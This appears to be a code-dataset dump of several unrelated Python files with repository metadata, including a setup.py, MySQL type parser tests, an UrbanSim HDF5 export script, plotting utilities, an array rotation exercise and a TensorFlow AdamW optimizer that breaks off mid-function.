17eaec434f1f65190a6e53d0055fe382841222de
|
[
"MIT"
] | null | null | null |
setup.py
|
hubmapconsortium/python-sdk
|
17eaec434f1f65190a6e53d0055fe382841222de
|
[
"MIT"
] | 8
|
2021-11-09T13:35:48.000Z
|
2022-03-04T15:56:52.000Z
|
setup.py
|
hubmapconsortium/python-sdk
|
17eaec434f1f65190a6e53d0055fe382841222de
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="hubmap-sdk",
version="1.0.1",
author="Hubmap",
author_email="api-developers@hubmapconsortium.org",
description="Python Client Libary to use HuBMAP web services",
long_description=long_description,
long_description_content_type="text/markdown",
packages=['hubmap_sdk'],
keywords=[
"HuBMAP Sdk",
"python"
],
install_requires=[
"certifi==2021.10.8",
"chardet==4.0.0",
"idna==2.10",
"requests==2.25.1",
"urllib3==1.26.7"
],
include_package_data=True,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
],
python_requires='>=3.6'
)
| 25.142857
| 66
| 0.606818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.428409
|
5529bf458e89cd64db669da48d12a440dd5e7310
| 14,095
|
py
|
Python
|
tests/grammar/test_data_type.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 28
|
2016-02-13T10:20:21.000Z
|
2022-03-10T02:41:58.000Z
|
tests/grammar/test_data_type.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 22
|
2016-02-15T15:55:09.000Z
|
2017-09-12T13:49:17.000Z
|
tests/grammar/test_data_type.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 16
|
2016-02-15T16:41:23.000Z
|
2021-05-18T04:51:52.000Z
|
# -*- encoding:utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import pyparsing
from mysqlparse.grammar.data_type import data_type_syntax
class DataTypeSyntaxTest(unittest.TestCase):
def test_bit(self):
self.assertEquals(data_type_syntax.parseString("BIT").data_type, 'BIT')
self.assertEquals(data_type_syntax.parseString("BIT(8)").data_type, 'BIT')
self.assertEquals(data_type_syntax.parseString("BIT(8)").length[0], '8')
def test_integers(self):
type_list = ['TINYINT', 'SMALLINT', 'MEDIUMINT', 'INT', 'INTEGER', 'BIGINT']
type_plain = "{type_name}".format
type_with_length = "{type_name}(8)".format
type_with_unsigned = "{type_name}(8) unsigned".format
type_with_zerofill = "{type_name}(8) zerofill".format
type_with_all_modifiers = "{type_name}(8) UNSIGNED ZEROFILL".format
for type_name in type_list:
self.assertEquals(
data_type_syntax.parseString(type_plain(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_length(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_length(type_name=type_name)).length[0],
'8',
)
self.assertFalse(
data_type_syntax.parseString(type_with_length(type_name=type_name)).unsigned,
)
self.assertFalse(
data_type_syntax.parseString(type_with_length(type_name=type_name)).zerofill,
)
self.assertEquals(
data_type_syntax.parseString(type_with_unsigned(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_unsigned(type_name=type_name)).length[0],
'8',
)
self.assertTrue(
data_type_syntax.parseString(type_with_unsigned(type_name=type_name)).unsigned,
)
self.assertEquals(
data_type_syntax.parseString(type_with_zerofill(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_zerofill(type_name=type_name)).length[0],
'8',
)
self.assertTrue(
data_type_syntax.parseString(type_with_zerofill(type_name=type_name)).zerofill,
)
self.assertEquals(
data_type_syntax.parseString(type_with_all_modifiers(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_all_modifiers(type_name=type_name)).length[0],
'8',
)
self.assertTrue(
data_type_syntax.parseString(type_with_all_modifiers(type_name=type_name)).unsigned,
)
self.assertTrue(
data_type_syntax.parseString(type_with_all_modifiers(type_name=type_name)).zerofill,
)
def test_decimals(self):
type_list = ['REAL', 'DOUBLE', 'FLOAT', 'DECIMAL', 'NUMERIC']
for type_name in type_list:
self.assertEquals(
data_type_syntax.parseString("{type_name}".format(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString("{type_name}(10)".format(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString("{type_name}(10)".format(type_name=type_name)).length,
'10',
)
self.assertEquals(
data_type_syntax.parseString("{type_name}(10, 2)".format(type_name=type_name)).decimals,
'2',
)
self.assertFalse(
data_type_syntax.parseString("{type_name}(10, 2)".format(type_name=type_name)).unsigned,
)
self.assertFalse(
data_type_syntax.parseString("{type_name}(10, 2)".format(type_name=type_name)).zerofill,
)
self.assertTrue(
data_type_syntax.parseString("{type_name}(10, 2) UNSIGNED".format(type_name=type_name)).unsigned,
)
self.assertTrue(
data_type_syntax.parseString("{type_name}(10, 2) ZEROFILL".format(type_name=type_name)).zerofill,
)
self.assertTrue(
data_type_syntax.parseString("{type_name}(10, 2) UNSIGNED ZEROFILL".format(type_name=type_name)).unsigned,
)
self.assertTrue(
data_type_syntax.parseString("{type_name}(10, 2) UNSIGNED ZEROFILL".format(type_name=type_name)).zerofill,
)
def test_datetimes(self):
self.assertEquals(data_type_syntax.parseString("DATE").data_type, 'DATE')
self.assertEquals(data_type_syntax.parseString("YEAR").data_type, 'YEAR')
type_list = ['TIME', 'TIMESTAMP', 'DATETIME']
type_plain = "{type_name}".format
type_with_precision = "{type_name}(6)".format
for type_name in type_list:
self.assertEquals(
data_type_syntax.parseString(type_plain(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_precision(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_precision(type_name=type_name)).precision[0],
'6',
)
def test_chars(self):
self.assertEquals(data_type_syntax.parseString("CHAR").data_type, 'CHAR')
self.assertEquals(data_type_syntax.parseString("CHAR(8)").length[0], '8')
self.assertEquals(data_type_syntax.parseString("CHAR(8) BINARY").length[0], '8')
self.assertEquals(data_type_syntax.parseString("CHAR(8) BINARY").binary, True)
self.assertEquals(data_type_syntax.parseString("CHAR(8) CHARACTER SET 'utf8'").character_set, "utf8")
self.assertEquals(data_type_syntax.parseString("CHAR(8) COLLATE 'utf8_general'").collation_name, "utf8_general")
self.assertEquals(
data_type_syntax.parseString(
"CHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).character_set,
"utf8"
)
self.assertEquals(
data_type_syntax.parseString(
"CHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).collation_name,
"utf8_general"
)
self.assertTrue(
data_type_syntax.parseString(
"CHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).binary,
)
def test_varchar(self):
with self.assertRaises(pyparsing.ParseException):
data_type_syntax.parseString("VARCHAR").data_type
self.assertEquals(data_type_syntax.parseString("VARCHAR(8)").length[0], '8')
self.assertEquals(data_type_syntax.parseString("VARCHAR(8) BINARY").length[0], '8')
self.assertEquals(data_type_syntax.parseString("VARCHAR(8) BINARY").binary, True)
self.assertEquals(data_type_syntax.parseString("VARCHAR(8) CHARACTER SET 'utf8'").character_set, "utf8")
self.assertEquals(
data_type_syntax.parseString("VARCHAR(8) COLLATE 'utf8_general'").collation_name,
"utf8_general",
)
self.assertEquals(
data_type_syntax.parseString(
"VARCHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).character_set,
"utf8"
)
self.assertEquals(
data_type_syntax.parseString(
"VARCHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).collation_name,
"utf8_general"
)
self.assertTrue(
data_type_syntax.parseString(
"VARCHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).binary,
)
def test_binary(self):
self.assertEquals(data_type_syntax.parseString("BINARY").data_type, 'BINARY')
self.assertEquals(data_type_syntax.parseString("BINARY(8)").data_type, 'BINARY')
self.assertEquals(data_type_syntax.parseString("BINARY(8)").length[0], '8')
def test_varbinary(self):
with self.assertRaises(pyparsing.ParseException):
data_type_syntax.parseString("VARBINARY").data_type
self.assertEquals(data_type_syntax.parseString("VARBINARY(8)").length[0], '8')
def test_blobs(self):
type_list = ['TINYBLOB', 'BLOB', 'MEDIUMBLOB', 'LONGBLOB']
for type_name in type_list:
self.assertEquals(data_type_syntax.parseString(type_name).data_type, type_name)
def test_texts(self):
type_list = ['TINYTEXT', 'TEXT', 'MEDIUMTEXT', 'LONGTEXT']
for type_name in type_list:
self.assertEquals(data_type_syntax.parseString(type_name).data_type, type_name)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} BINARY".format(type_name=type_name)
).data_type,
type_name,
)
self.assertTrue(
data_type_syntax.parseString(
"{type_name} BINARY".format(type_name=type_name)
).binary,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} CHARACTER SET 'utf8'".format(type_name=type_name)
).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} CHARACTER SET 'utf8'".format(type_name=type_name)
).character_set,
'utf8',
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} COLLATE 'utf8_general_ci'".format(type_name=type_name)
).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} COLLATE 'utf8_general_ci'".format(type_name=type_name)
).collation_name,
'utf8_general_ci',
)
self.assertFalse(
data_type_syntax.parseString(
"{type_name} COLLATE 'utf8_general_ci'".format(type_name=type_name)
).binary,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(type_name=type_name)
).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(type_name=type_name)
).character_set,
'utf8',
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(type_name=type_name)
).collation_name,
'utf8_general_ci',
)
self.assertTrue(
data_type_syntax.parseString(
"{type_name} BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(type_name=type_name)
).binary,
)
def test_enumerables(self):
type_list = ['ENUM', 'SET']
for type_name in type_list:
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3')".format(type_name=type_name)
).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3')".format(type_name=type_name)
).value_list.asList(),
['option1', 'option2', 'option3'],
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8'".format(type_name=type_name)
).value_list.asList(),
['option1', 'option2', 'option3'],
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8'".format(type_name=type_name)
).character_set,
'utf8',
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8'".format(type_name=type_name)
).value_list.asList(),
['option1', 'option2', 'option3'],
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8'".format(type_name=type_name)
).character_set,
'utf8',
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(
type_name=type_name
)
).collation_name,
'utf8_general_ci',
)
| 40.386819
| 122
| 0.57602
| 13,890
| 0.985456
| 0
| 0
| 0
| 0
| 0
| 0
| 2,574
| 0.182618
|
5529c5dbc7514236bc8611211cfb848e2618a841
| 2,615
|
py
|
Python
|
bayarea_urbansim/data_regeneration/export_to_h5.py
|
ual/DOE-repo-deliverable
|
4bafdd9a702a9a6466dd32ae62f440644d735d3c
|
[
"BSD-3-Clause"
] | null | null | null |
bayarea_urbansim/data_regeneration/export_to_h5.py
|
ual/DOE-repo-deliverable
|
4bafdd9a702a9a6466dd32ae62f440644d735d3c
|
[
"BSD-3-Clause"
] | null | null | null |
bayarea_urbansim/data_regeneration/export_to_h5.py
|
ual/DOE-repo-deliverable
|
4bafdd9a702a9a6466dd32ae62f440644d735d3c
|
[
"BSD-3-Clause"
] | null | null | null |
import pandas as pd
from spandex import TableLoader
import pandas.io.sql as sql
loader = TableLoader()
def db_to_df(query):
"""Executes SQL query and returns DataFrame."""
conn = loader.database._connection
return sql.read_frame(query, conn)
## Export to HDF5- get path to output file
h5_path = loader.get_path('out/regeneration/summaries/bayarea_v3.h5') ## Path to the output file
#Buildings
buildings = db_to_df('select * from building').set_index('building_id')
if 'id' in buildings.columns:
del buildings['id']
buildings['building_type_id'] = 0
buildings.building_type_id[buildings.development_type_id == 1] = 1
buildings.building_type_id[buildings.development_type_id == 2] = 3
buildings.building_type_id[buildings.development_type_id == 5] = 12
buildings.building_type_id[buildings.development_type_id == 7] = 10
buildings.building_type_id[buildings.development_type_id == 9] = 5
buildings.building_type_id[buildings.development_type_id == 10] = 4
buildings.building_type_id[buildings.development_type_id == 13] = 8
buildings.building_type_id[buildings.development_type_id == 14] = 7
buildings.building_type_id[buildings.development_type_id == 15] = 9
buildings.building_type_id[buildings.development_type_id == 13] = 8
buildings.building_type_id[buildings.development_type_id == 17] = 6
buildings.building_type_id[buildings.development_type_id == 24] = 16
#Parcels
parcels = db_to_df('select * from parcel').set_index('parcel_id')
parcels['shape_area'] = parcels.acres * 4046.86
if 'id' in parcels.columns:
del parcels['id']
if 'geom' in parcels.columns:
del parcels['geom']
if 'centroid' in parcels.columns:
del parcels['centroid']
#Jobs
jobs = db_to_df('select * from jobs').set_index('job_id')
if 'id' in jobs.columns:
del jobs['id']
#Households
hh = db_to_df('select * from households').set_index('household_id')
if 'id' in hh.columns:
del hh['id']
hh = hh.rename(columns = {'hinc':'income'})
for col in hh.columns:
hh[col] = hh[col].astype('int32')
#Zones
zones_path = loader.get_path('juris/reg/zones/zones.csv')
zones = pd.read_csv(zones_path).set_index('zone_id')
#Putting tables in the HDF5 file
store = pd.HDFStore(h5_path)
store['parcels'] = parcels # http://urbansim.org/Documentation/Parcel/ParcelTable
store['buildings'] = buildings # http://urbansim.org/Documentation/Parcel/BuildingsTable
store['households'] = hh # http://urbansim.org/Documentation/Parcel/HouseholdsTable
store['jobs'] = jobs # http://urbansim.org/Documentation/Parcel/JobsTable
store['zones'] = zones # http://urbansim.org/Documentation/Parcel/ZonesTable
store.close()
| 39.029851
| 97
| 0.757553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 838
| 0.320459
|
552b355ab9a4608d3f4dc4d7df2c3b24e79e210d
| 7,060
|
py
|
Python
|
minder_utils/visualisation/feature_engineering.py
|
alexcapstick/minder_utils
|
3bb9380b7796b5dd5b995ce1839ea6a94321021d
|
[
"MIT"
] | null | null | null |
minder_utils/visualisation/feature_engineering.py
|
alexcapstick/minder_utils
|
3bb9380b7796b5dd5b995ce1839ea6a94321021d
|
[
"MIT"
] | null | null | null |
minder_utils/visualisation/feature_engineering.py
|
alexcapstick/minder_utils
|
3bb9380b7796b5dd5b995ce1839ea6a94321021d
|
[
"MIT"
] | 1
|
2022-03-16T11:10:43.000Z
|
2022-03-16T11:10:43.000Z
|
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import seaborn as sns
import pandas as pd
from minder_utils.formatting.label import label_by_week, label_dataframe
from minder_utils.feature_engineering import Feature_engineer
from minder_utils.feature_engineering.calculation import *
from minder_utils.util import formatting_plots
from minder_utils.formatting import Formatting
fe = Feature_engineer(Formatting())
sns.set()
att = 'bathroom_night'
figure_title = {
'bathroom_night': 'Bathroom activity during the night',
'bathroom_daytime': 'Bathroom activity during the day',
}
patient_id = ''
def process_dataframe(df, week_shift=0):
df = df[df.id == patient_id]
map_dict = {i: j - week_shift for j, i in enumerate(df.week.sort_values().unique())}
df.week = df.week.map(map_dict)
return df
def visualise_flags(df):
for v in [True, False]:
data = df[df.valid == v]
not_labelled = True
for week in data.week.unique():
if v is True:
plt.axvline(week, 0, 0.17, color='red', label='UTI' if not_labelled else None)
not_labelled = False
elif v is False:
plt.axvline(week, 0, 0.17, color='blue', label='not UTI' if not_labelled else None)
not_labelled = False
@formatting_plots(figure_title[att])
def visualise_weekly_data(df):
df = process_dataframe(df)
sns.violinplot(data=df, x='week', y='value')
visualise_flags(df)
return df
@formatting_plots('P value, ' + figure_title[att])
def visualise_weekly_statistical_analysis(df, results):
df = process_dataframe(df, 1)
visualise_flags(df)
data = results[patient_id]
df = {'week': [], 'p_value': []}
for idx, sta in enumerate(data):
df['week'].append(idx + 1)
df['p_value'].append(sta[1])
sns.lineplot(df['week'], df['p_value'])
@formatting_plots('Body temperature')
def visualise_body_temperature(df):
df = process_dataframe(df)
visualise_flags(df)
sns.lineplot(df.week, df.value)
def visualise_data_time_lineplot(time_array, values_array, name, fill_either_side_array=None, fig = None, ax = None):
'''
This function accepts a dataframe that has a ```'time'``` column and
and a ```'value'``` column.
'''
if ax is None:
fig, ax = plt.subplots(1,1,figsize = (10,6))
ax.plot(time_array, values_array)
if not fill_either_side_array is None:
ax.fill_between(time_array,
y1=values_array-fill_either_side_array,
y2=values_array+fill_either_side_array,
alpha = 0.3)
return fig, ax
def visualise_data_time_heatmap(data_plot, name, fig = None, ax = None):
'''
This function accepts a dataframe in which the columns are the days and
the rows are the aggregated times of the day.
'''
if ax is None:
fig, axes = plt.subplots(1,1,figsize = (10,6))
ax = sns.heatmap(data_plot.values, cmap = 'Blues', cbar_kws={'label': name})
ax.invert_yaxis()
x_tick_loc = np.arange(0, data_plot.shape[1], 90)
ax.set_xticks(x_tick_loc + 0.5)
ax.set_xticklabels(data_plot.columns.astype(str)[x_tick_loc].values)
y_tick_loc = np.arange(0, data_plot.shape[0], 3)
ax.set_yticks(y_tick_loc + 0.5)
ax.set_yticklabels([pd.to_datetime(time).strftime("%H:%M") for time in data_plot.index.values[y_tick_loc]], rotation = 0)
ax.set_xlabel('Day')
ax.set_ylabel('Time of Day')
return fig, ax
def visualise_activity_daily_data(fe):
'''
Arguments
---------
- fe: class:
The feature engineering class that produces the data.
'''
activity_daily = fe.activity_specific_agg(agg='daily', load_smaller_aggs = True)
activity_daily = label_dataframe(activity_daily, days_either_side=0)
activity_daily=activity_daily.rename(columns = {'valid':'UTI Label'})
activity_daily['Feature'] = activity_daily['location'].map(fe.info)
sns.set_theme('talk')
fig_list = []
axes_list = []
for feature in activity_daily['location'].unique():
data_plot = activity_daily[activity_daily['location'].isin([feature])]
fig, ax = plt.subplots(1,1,figsize = (8,6))
ax = sns.boxplot(data=data_plot, x='value', y = 'Feature', hue='UTI Label', ax=ax, **{'showfliers':False})
ax.set_ylabel(None)
ax.set_yticks([])
ax.set_title('{}'.format(fe.info[feature]))
ax.set_xlabel('Value')
fig_list.append(fig)
axes_list.append(ax)
return fig_list, axes_list
def visualise_activity_weekly_data(fe):
'''
Arguments
---------
- fe: class:
The feature engineering class that produces the data.
'''
activity_weekly = fe.activity_specific_agg(agg='weekly', load_smaller_aggs = True)
activity_weekly = label_by_week(activity_weekly)
activity_weekly=activity_weekly.rename(columns = {'valid':'UTI Label'})
activity_weekly['Feature'] = activity_weekly['location'].map(fe.info)
sns.set_theme('talk')
fig_list = []
axes_list = []
for feature in activity_weekly['location'].unique():
data_plot = activity_weekly[activity_weekly['location'].isin([feature])]
fig, ax = plt.subplots(1,1,figsize = (8,6))
ax = sns.boxplot(data=data_plot, x='value', y = 'Feature', hue='UTI Label', ax=ax, **{'showfliers':False})
ax.set_ylabel(None)
ax.set_yticks([])
ax.set_title('{}'.format(fe.info[feature]))
ax.set_xlabel('Value')
fig_list.append(fig)
axes_list.append(ax)
return fig_list, axes_list
def visualise_activity_evently_data(fe):
'''
Arguments
---------
- fe: class:
The feature engineering class that produces the data.
'''
activity_evently = fe.activity_specific_agg(agg='evently', load_smaller_aggs = True)
activity_evently = label_dataframe(activity_evently, days_either_side=0)
activity_evently=activity_evently.rename(columns = {'valid':'UTI Label'})
activity_evently['Feature'] = activity_evently['location'].map(fe.info)
sns.set_theme('talk')
fig_list = []
axes_list = []
for feature in activity_evently['location'].unique():
data_plot = activity_evently[activity_evently['location'].isin([feature])]
fig, ax = plt.subplots(1,1,figsize = (8,6))
ax = sns.boxplot(data=data_plot, x='value', y = 'Feature', hue='UTI Label', ax=ax, **{'showfliers':False})
ax.set_ylabel(None)
ax.set_yticks([])
ax.set_title('{}'.format(fe.info[feature]))
ax.set_xlabel('Value')
fig_list.append(fig)
axes_list.append(ax)
return fig_list, axes_list
if __name__ == '__main__':
results = weekly_compare(getattr(fe, att), kolmogorov_smirnov)
df = label_by_week(getattr(fe, att))
visualise_weekly_data(df)
visualise_weekly_statistical_analysis(df)
visualise_body_temperature(label_by_week(fe.body_temperature))
| 28.699187
| 125
| 0.657507
| 0
| 0
| 0
| 0
| 734
| 0.103966
| 0
| 0
| 1,264
| 0.179037
|
552c410668701cd1585658195d593e1b5751e350
| 442
|
py
|
Python
|
code-everyday-challenge/n159_cyclically_rotate.py
|
ved93/deliberate-practice-challenges
|
2fccdbb9d2baaa16f888055c081a8d04804c0045
|
[
"MIT"
] | null | null | null |
code-everyday-challenge/n159_cyclically_rotate.py
|
ved93/deliberate-practice-challenges
|
2fccdbb9d2baaa16f888055c081a8d04804c0045
|
[
"MIT"
] | null | null | null |
code-everyday-challenge/n159_cyclically_rotate.py
|
ved93/deliberate-practice-challenges
|
2fccdbb9d2baaa16f888055c081a8d04804c0045
|
[
"MIT"
] | null | null | null |
# https://practice.geeksforgeeks.org/problems/cyclically-rotate-an-array-by-one2614/1
# Given an array, rotate the array by one position in clock-wise direction.
# Input:
# N = 5
# A[] = {1, 2, 3, 4, 5}
# Output:
# 5 1 2 3 4
def rotate_cycle(a):
n = len(a)
tmp = a[-1]
for i in range(1,n):
a[-i] = a[-i-1]
a[0] = tmp
return a
if __name__ == "__main__":
a = [1, 2, 3,4,5]
print(rotate_cycle(a))
| 17.68
| 85
| 0.567873
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 228
| 0.515837
|
552d7c8af23d30920337cc95fa4d7065705c0c5f
| 10,800
|
py
|
Python
|
adamw_optimizer.py
|
pwldj/Bio_XLNet_CRF
|
536053e9d74abdb2ee56000a8a779ffc1c0dd0fc
|
[
"Apache-2.0"
] | null | null | null |
adamw_optimizer.py
|
pwldj/Bio_XLNet_CRF
|
536053e9d74abdb2ee56000a8a779ffc1c0dd0fc
|
[
"Apache-2.0"
] | 2
|
2022-03-07T07:27:13.000Z
|
2022-03-07T07:27:15.000Z
|
adamw_optimizer.py
|
pwldj/MTL-BioNER
|
3fb336f517346daeec6a716fa6a657a421754bdb
|
[
"Apache-2.0"
] | 1
|
2021-05-05T08:42:53.000Z
|
2021-05-05T08:42:53.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adamw for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import tensorflow as tf
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import optimizer
class AdamOptimizer(optimizer.Optimizer):
def __init__(self,
learning_rate=0.001,
weight_decay_rate=0.0,
beta1=0.9,
beta2=0.999,
epsilon=1e-8,
exclude_from_weight_decay=None,
include_in_weight_decay=None,
use_locking=False,
name="Adamw"):
"""
This is a multi Gpu version of adamw.
:param learning_rate:
:param weight_decay_rate:
:param beta1:
:param beta2:
:param epsilon:
:param exclude_from_weight_decay:
:param include_in_weight_decay:
:param use_locking:
:param name:
"""
super(AdamOptimizer, self).__init__(use_locking, name)
self._lr = learning_rate
self._beta1 = beta1
self._beta2 = beta2
self._epsilon = epsilon
self._weight_decay_rate = weight_decay_rate
self._exclude_from_weight_decay = exclude_from_weight_decay
self._include_in_weight_decay = include_in_weight_decay
# Tensor versions of the constructor arguments, created in _prepare().
self._lr_t = None
self._weight_decay_rate_t = None
self._beta1_t = None
self._beta2_t = None
self._epsilon_t = None
def _get_beta_accumulators(self):
with ops.init_scope():
if context.executing_eagerly():
graph = None
else:
graph = ops.get_default_graph()
return (self._get_non_slot_variable("beta1_power", graph=graph),
self._get_non_slot_variable("beta2_power", graph=graph))
def _create_slots(self, var_list):
# Create the beta1 and beta2 accumulators on the same device as the first
# variable. Sort the var_list to make sure this device is consistent across
# workers (these need to go on the same PS, otherwise some updates are
# silently ignored).
first_var = min(var_list, key=lambda x: x.name)
self._create_non_slot_variable(
initial_value=self._beta1, name="beta1_power", colocate_with=first_var)
self._create_non_slot_variable(
initial_value=self._beta2, name="beta2_power", colocate_with=first_var)
# Create slots for the first and second moments.
for v in var_list:
self._zeros_slot(v, "adam_m", self._name)
self._zeros_slot(v, "adam_v", self._name)
def _prepare(self):
lr = self._call_if_callable(self._lr)
beta1 = self._call_if_callable(self._beta1)
beta2 = self._call_if_callable(self._beta2)
weight_decay_rate = self._call_if_callable(self._weight_decay_rate)
epsilon = self._call_if_callable(self._epsilon)
self._lr_t = ops.convert_to_tensor(lr, name="learning_rate")
self._beta1_t = ops.convert_to_tensor(beta1, name="beta1")
self._beta2_t = ops.convert_to_tensor(beta2, name="beta2")
self._weight_decay_rate_t = ops.convert_to_tensor(
weight_decay_rate, name="weight_decay_rate")
self._epsilon_t = ops.convert_to_tensor(epsilon, name="epsilon")
def _apply_dense(self, grad, var):
lr_t = math_ops.cast(self._lr_t, var.dtype.base_dtype)
beta1_t = math_ops.cast(self._beta1_t, var.dtype.base_dtype)
beta2_t = math_ops.cast(self._beta2_t, var.dtype.base_dtype)
weight_decay_rate = math_ops.cast(
self._weight_decay_rate_t, var.dtype.base_dtype)
epsilon_t = math_ops.cast(self._epsilon_t, var.dtype.base_dtype)
beta1_power, beta2_power = self._get_beta_accumulators()
beta1_power = math_ops.cast(beta1_power, var.dtype.base_dtype)
beta2_power = math_ops.cast(beta2_power, var.dtype.base_dtype)
lr = (lr_t * math_ops.sqrt(1 - beta2_power) / (1 - beta1_power))
m = self.get_slot(var, "adam_m")
v = self.get_slot(var, "adam_v")
m_t = (tf.multiply(beta1_t, m) + tf.multiply(1.0 - beta1_t, grad))
m_t = m.assign(m_t, use_locking=self._use_locking)
v_t = (tf.multiply(beta2_t, v) + tf.multiply(1.0 - beta2_t, tf.square(grad)))
v_t = v.assign(v_t, use_locking=self._use_locking)
m_t_hat = m_t / (1. - beta1_power)
v_t_hat = v_t / (1. - beta2_power)
update = m_t_hat / (tf.sqrt(v_t_hat) + epsilon_t)
if self._do_use_weight_decay(var.name):
update += weight_decay_rate * var
var_update = var - lr * update
var_update = var.assign(var_update, use_locking=self._use_locking)
return tf.group(*[var_update, m_t, v_t])
def _resource_apply_dense(self, grad, var):
lr_t = math_ops.cast(self._lr_t, var.dtype.base_dtype)
beta1_t = math_ops.cast(self._beta1_t, var.dtype.base_dtype)
beta2_t = math_ops.cast(self._beta2_t, var.dtype.base_dtype)
weight_decay_rate = math_ops.cast(
self._weight_decay_rate_t, var.dtype.base_dtype)
epsilon_t = math_ops.cast(self._epsilon_t, var.dtype.base_dtype)
beta1_power, beta2_power = self._get_beta_accumulators()
beta1_power = math_ops.cast(beta1_power, var.dtype.base_dtype)
beta2_power = math_ops.cast(beta2_power, var.dtype.base_dtype)
lr = (lr_t * math_ops.sqrt(1 - beta2_power) / (1 - beta1_power))
m = self.get_slot(var, "adam_m")
v = self.get_slot(var, "adam_v")
m_t = (tf.multiply(beta1_t, m) + tf.multiply(1.0 - beta1_t, grad))
m_t = m.assign(m_t, use_locking=self._use_locking)
v_t = (tf.multiply(beta2_t, v) + tf.multiply(1.0 - beta2_t, tf.square(grad)))
v_t = v.assign(v_t, use_locking=self._use_locking)
m_t_hat = m_t / (1. - beta1_power)
v_t_hat = v_t / (1. - beta2_power)
update = m_t_hat / (tf.sqrt(v_t_hat) + epsilon_t)
if self._do_use_weight_decay(var.name):
update += weight_decay_rate * var
var_update = var - lr * update
var_update = var.assign(var_update, use_locking=self._use_locking)
return tf.group(*[var_update, m_t, v_t])
def _apply_sparse_shared(self, grad, var, indices, scatter_add):
beta1_power, beta2_power = self._get_beta_accumulators()
beta1_power = math_ops.cast(beta1_power, var.dtype.base_dtype)
beta2_power = math_ops.cast(beta2_power, var.dtype.base_dtype)
lr_t = math_ops.cast(self._lr_t, var.dtype.base_dtype)
beta1_t = math_ops.cast(self._beta1_t, var.dtype.base_dtype)
beta2_t = math_ops.cast(self._beta2_t, var.dtype.base_dtype)
epsilon_t = math_ops.cast(self._epsilon_t, var.dtype.base_dtype)
lr = (lr_t * math_ops.sqrt(1 - beta2_power) / (1 - beta1_power))
# m_t = beta1 * m + (1 - beta1) * g_t
m = self.get_slot(var, "adam_m")
m_scaled_g_values = grad * (1 - beta1_t)
m_t = state_ops.assign(m, m * beta1_t, use_locking=self._use_locking)
with ops.control_dependencies([m_t]):
